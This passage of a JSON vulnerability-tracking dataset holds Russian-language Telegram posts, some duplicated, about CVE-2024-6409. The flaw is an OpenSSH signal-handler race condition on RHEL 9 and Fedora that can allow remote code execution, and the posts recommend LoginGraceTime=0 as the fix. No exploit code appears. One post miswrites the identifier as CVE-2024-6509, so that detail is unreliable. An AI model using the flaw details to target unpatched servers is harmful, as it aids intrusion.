SSH.\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 RHEL 9, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 8.7.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Fedora Linux 36 \u0438 37, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 OpenSSH 8.7 \u0438 8.8.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u0439 SIGALRM, \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439. \u041e\u043d\u043e \u0437\u0434\u0435\u0441\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u044b\u0437\u043e\u0432\u043e\u043c cleanup_exit() \u0432 grace_alarm_handler() \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0425\u043e\u0442\u044f\u00a0cleanup_exit() \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u043c \u043a\u043e\u0434\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434\u043e\u0432\u043e\u0439 \u0431\u0430\u0437\u0435 OpenSSH, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043d\u043e\u0435 \u043a \u043f\u0430\u043a\u0435\u0442\u0430\u043c RHEL 9 \u0438 Fedora, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 cleanup_exit() \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0430\u0443\u0434\u0438\u0442\u0430, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e\u00a0\u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044e\u00a0Solar Designer \u043d\u0430 Openwall, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 CVE-2024-6387 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b RCE \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0441\u043c\u044f\u0433\u0447\u0430\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0449\u0435\u0440\u0431.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u043b\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0430, \u0434\u0440\u0443\u0433\u0430\u044f \u0441\u0442\u0430\u043d\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439.\n\n\u041a\u0430\u043a \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 Designer, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0442\u0438\u0432 \u043b\u044e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0438\u043b\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0445\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Fedora, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 Fedora 38, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 cleanup_exit().\n\n\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u0434\u043b\u044f CVE-2024-6387, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u043e\u043f\u0446\u0438\u044e -e \u0432 sshd \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 syslog, \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442 \u044d\u0442\u0443 \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime=0 \u0432 sshd_config \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-07-09T20:20:10.000000Z"}, {"uuid": "5a4492db-efa2-4291-bfde-7af3612e5787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/CyberSachok/1873", "content": "\u041d\u0435 \u043f\u0440\u043e\u0448\u043b\u043e \u0438 \u043c\u0435\u0441\u044f\u0446\u0430\n\n\u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0435\u0441\u044f\u0446\u0430 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RegreSSHion \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 OpenSSH. \u041f\u043e\u0441\u043b\u0435 \u0435\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u043d\u0430 \u043d\u043e\u0432\u0443\u044e \u0431\u0440\u0435\u0448\u044c \u0432\u044b\u0448\u0435\u043b \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041f\u0435\u0441\u043b\u044f\u043a(Solar designer). \n\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c(CVE-2024-6509) \u0432 \u043d\u0430\u0431\u043e\u0440\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0432\u044f\u0437\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \n\nCVE-2024-6409 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep.\n\n\u00ab\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u0431\u0440\u0435\u0448\u0438 \u043e\u0442 CVE-2024-6387 \u2014 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u041f\u0435\u0441\u043b\u044f\u043a.\n\n\u00ab\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u0440\u0438\u0441\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0441\u043d\u0438\u0436\u0430\u044e\u0442\u0441\u044f. \u041e\u0434\u043d\u0430\u043a\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0435\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e CVE-2024-6387 \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445\u00bb.\n\n@cybersachok", "creation_timestamp": "2024-07-12T12:39:50.000000Z"}, {"uuid": "9caa8615-0fd1-4435-8c50-2777b8bafbd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ZerodayAlert/273", "content": "\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u044b RHEL 9\n\n\ud83d\udd13 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6409 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH \u0434\u043b\u044f RHEL 9. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u23f1 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 (Race Condition) \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f SIGALRM. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043d\u0435 \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u0437 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\ud83d\udee0 \u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime \u0432 0 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd. \u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n#OpenSSH #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #RHEL9 #InfoSec\n\n@ZerodayAlert", "creation_timestamp": "2026-07-06T11:00:05.537692Z"}, {"uuid": "283c8b0d-38ac-44ce-9fd6-c6ebeee9c41e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ZerodayAlert/273", "content": "\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u044b RHEL 9\n\n\ud83d\udd13 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6409 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH \u0434\u043b\u044f RHEL 9. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u23f1 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 (Race Condition) \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f SIGALRM. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043d\u0435 \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u0437 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\ud83d\udee0 \u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime \u0432 0 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd. \u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n#OpenSSH #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #RHEL9 #InfoSec\n\n@ZerodayAlert", "creation_timestamp": "2026-07-07T00:00:07.905326Z"}, {"uuid": "da366af9-419d-4dbe-a12e-a5bc11557444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ZerodayAlert/273", "content": "\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u044b RHEL 9\n\n\ud83d\udd13 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6409 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH \u0434\u043b\u044f RHEL 9. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u23f1 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 (Race Condition) \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f SIGALRM. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043d\u0435 \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u0437 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\ud83d\udee0 \u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime \u0432 0 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd. \u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n#OpenSSH #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #RHEL9 #InfoSec\n\n@ZerodayAlert", "creation_timestamp": "2026-07-11T22:00:07.184231Z"}, {"uuid": "c6660262-767f-454b-a6f0-9eae0b339bd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ZerodayAlert/273", "content": "\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u044b RHEL 9\n\n\ud83d\udd13 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6409 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH \u0434\u043b\u044f RHEL 9. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 